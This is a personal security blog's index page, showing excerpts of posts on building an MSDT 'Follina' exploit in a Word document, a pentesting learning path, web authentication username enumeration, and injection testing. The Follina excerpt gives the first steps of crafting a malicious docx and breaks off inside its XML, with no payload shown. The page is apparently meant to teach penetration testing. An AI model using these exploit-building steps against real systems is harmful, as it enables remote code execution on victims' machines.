}}
JA Jobyer Ahmed

Blog

  • MSDT-Follina Exploit for Initial Access

    A new Remote Code Execution vulnerability for Microsoft Windows Support Diagnostic Tool(MSDT) which can be exploited using Microsoft Office Word(2013-2021). Developing the exploit Step 1 Create a docx file in your Microsoft Office Word Step 2: Edit Using 7z zip Step 3 Go to word\_rels\document.xml.rels , right click>edit The content should be exactly like: <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId1" Type="http://schemas.

    Read more →

  • Penetration Testing Learning Path

    It is a long journey. We need to prepare ourselves for adjusting ourselves to learn new methods and technique. If someone is beginner, they can follow this path to start the learning on penetration Testing. This is just a short syllabus. There are more advanced topics but it is a good start for newbie! Many Guys asked me if there is any learning path to follow I can tell them. So to favore them, i publishied this here, which published on my GitHub already, and also some youtube video!

    Read more →

  • Pentesting Web Auth

    Username Enumeration Username can be enumerated in various way. For Example: Test with valid/invalid username and observe error message, and also compare Content length for both request. Analyze the URL for different behaviors, such as valid user get https://redtm.com/valid?err=1 and wrong user get https://redtm.com/valid?err=0. Observe http error message, such as a valid user url https://ip/admin giving error 403 whereas https://ip/wrongUser error is 404. Analyze the Pages title. The page title could be a different for wrong/right username.

    Read more →

  • Server-Side input validation testing

    The common technique to find input validation vulnerability: Fuzz All parameters for OS Command Injection Encode payload in different way to bypass filter! SQL Injection SQL injection is most of the popular web hacking technique. If the web app is vulnerable to SQL Injection, Attackers can read, write data in database, and in some case able execute system command. Union Based SQLi - We can retrieve data from different database table.

    Read more →